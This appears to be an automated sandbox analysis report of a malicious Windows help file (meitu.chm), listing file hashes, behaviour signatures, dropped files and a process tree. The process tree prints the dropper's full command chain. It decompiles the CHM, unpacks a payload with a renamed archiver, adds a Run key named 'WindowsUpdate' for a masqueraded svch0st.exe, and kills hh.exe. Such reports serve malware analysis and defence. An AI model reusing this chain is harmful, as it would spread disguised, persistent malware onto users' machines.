Overview

overview

10

Static

static

1

virus/meitu.chm

windows7-x64

1

virus/meitu.chm

windows10-2004-x64

7

virus/白�...ow.dll

windows7-x64

10

virus/白�...ow.dll

windows10-2004-x64

10

virus/白�...st.exe

windows7-x64

virus/白�...st.exe

windows10-2004-x64

Analysis

  • max time kernel
    131s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-03-2023 03:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    virus/meitu.chm

  • Size

    1.2MB

  • MD5

    3dbfbb912f430ae62df647a767a86884

  • SHA1

    0604930ef6eef2e10ae38e9b89d819ecda25f847

  • SHA256

    8ffcc91dcb5657a9e8012bdc8b3b73bf541161f7c619e824fd5c5ae4b9b129f1

  • SHA512

    984f57541f443b36b991df5a2bbb4f55760a9a08f0b49d3fb9908c6bcc0a7fa6eb16cb3c2fbb659e700836af35eef942c007ab60c4bb09972d6a34968dc1e38d

  • SSDEEP

    24576:i7cuHGvz89BSOMfdLDCb1IlosIfHvzceiw3L3DYxROi2nmbvkIOMaNC:i7cuG89BSOALDs7sIPvzceiwb3DYv5bl

Score
7/10
persistence

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\virus\meitu.chm
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3568
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\System32\cmd.exe
        cmd /C hh -decompile C:\ProgramData\echelp ./meitu.chm&ping 127.0.0.1 -n 1 >nul&cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\duankai.lnk&cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f&ping 127.0.0.1 -n 1 >nul&start C:\ProgramData\echelp\svch0st.exe&start C:\ProgramData\echelp\ipconfig.lnk&taskkill /f /t /im hh.exe
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:448
        • C:\Windows\hh.exe
          hh -decompile C:\ProgramData\echelp ./meitu.chm
          4⤵
            PID:2588
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 1
            4⤵
            • Runs ping.exe
            PID:628
          • C:\Windows\system32\cmd.exe
            cmd /C C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:864
            • C:\ProgramData\echelp\system_wiNuirements.mht
              C:\ProgramData\echelp\system_wiNuirements.mht x C:\ProgramData\echelp\introducziPn.mht -O- C:\ProgramData\echelp\
              5⤵
              • Executes dropped EXE
              PID:732
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 1
            4⤵
            • Runs ping.exe
            PID:4260
          • C:\Windows\System32\ipconfig.exe
            "C:\Windows\System32\ipconfig.exe" /release
            4⤵
            • Gathers network information
            PID:1668
          • C:\Windows\system32\cmd.exe
            cmd /C reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1728
            • C:\Windows\system32\reg.exe
              reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsUpdate /t REG_SZ /d \"C:\ProgramData\echelp\svch0st.exe\" /f
              5⤵
              • Adds Run key to start application
              • Modifies registry key
              PID:1632
          • C:\Windows\system32\PING.EXE
            ping 127.0.0.1 -n 1
            4⤵
            • Runs ping.exe
            PID:2556
          • C:\ProgramData\echelp\svch0st.exe
            C:\ProgramData\echelp\svch0st.exe
            4⤵
            • Executes dropped EXE
            PID:4312
          • C:\Windows\System32\ipconfig.exe
            "C:\Windows\System32\ipconfig.exe" /renew
            4⤵
            • Gathers network information
            PID:3864
          • C:\Windows\system32\taskkill.exe
            taskkill /f /t /im hh.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3656

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\echelp\duankai.lnk
      Filesize

      1KB

      MD5

      494737c8bba58f091393c67d1a03f6c5

      SHA1

      2dadf68af7cef6a71638abdcf9002244b8234b46

      SHA256

      ce4d3b1be35448fedade51dfe257d5e416209dfa3602dbab194933c33a29459f

      SHA512

      60e09087de9b04153e88e3ea9d08f9860189f6475fbf8a20f3bc153586f02d9a20da88327e53d10be3af86700abc63eca74f7b25e3282aefdf3e2bd72e1d17e4

      Download Submit
    • C:\ProgramData\echelp\introducziPn.mht
      Filesize

      891KB

      MD5

      0bad47cb97f01d24fdbefe3905d92d14

      SHA1

      75304034da42d22101a9680dc210ad76477d48bb

      SHA256

      621d858908e53288bac2581c51c6a401300d6e66365a21310d865ee392da0670

      SHA512

      37c54f4466c386f379c0ab10f7ca918ef019be41d2c5b45c2c02eaf59f41692d14f3600b08a2b5f05ed5994c397787b441526f73eded9e0300a7165e3af1b256

      Download Submit
    • C:\ProgramData\echelp\ipconfig.lnk
      Filesize

      1KB

      MD5

      85816dff477434c9eee3dfb7f5adec3d

      SHA1

      f74a01d32eab8b975fef93802fecfe764a60dbb6

      SHA256

      960935b125cb86149b7c5399a050ecc6ce91164a156662cd181319c479c54212

      SHA512

      059aa8fd552c86c7504a93fda065cef5d1fdb93514ae99d459b517a2c5554c33d9c32d5b3f91a4adaba54185171cd4238e5813dd4568bed143097f4523e8759f

      Download Submit
    • C:\ProgramData\echelp\svch0st.exe
      Filesize

      985KB

      MD5

      9606b727e58cb0157e1586adac252462

      SHA1

      9bbb77aea71b44f0f7737ed47bae3fa67df6c8d4

      SHA256

      8fcbe954783759e96a9cc1cf6aa2cb16d6c95a8f0a0c661ee0c1e241079c6de2

      SHA512

      1d07695b0d597703336d0d0a50353712c83ba5354de006a7a444dd270253ce5a4e362cb98e83acfedabe325f29e3da51946cc3625bb8f452cf212cdccc9eba1f

      Download Submit
    • C:\ProgramData\echelp\system_wiNuirements.mht
      Filesize

      587KB

      MD5

      b5f45160976bb7ebac87b62ea1e6abcd

      SHA1

      0d08f13587ba55ca7792bf45ef2cc3d9925e411f

      SHA256

      2f32d221f332feb1530896849a5345b9dba7a64b6c432b99b2846bfaa316044c

      SHA512

      a0afc0ef35980157623b6390304a8427f9932ca8492fdc251cbb2802fb70e82b74b8c774d4df2f9b9968e970181dc2e382979e11d8b90d632a83ba6cea5c411a

      Download Submit
    • C:\ProgramData\echelp\system_wiNuirements.mht
      Filesize

      587KB

      MD5

      b5f45160976bb7ebac87b62ea1e6abcd

      SHA1

      0d08f13587ba55ca7792bf45ef2cc3d9925e411f

      SHA256

      2f32d221f332feb1530896849a5345b9dba7a64b6c432b99b2846bfaa316044c

      SHA512

      a0afc0ef35980157623b6390304a8427f9932ca8492fdc251cbb2802fb70e82b74b8c774d4df2f9b9968e970181dc2e382979e11d8b90d632a83ba6cea5c411a

      Download Submit
    • memory/732-168-0x0000000000400000-0x0000000000507000-memory.dmp
      Filesize

      1.0MB

      Download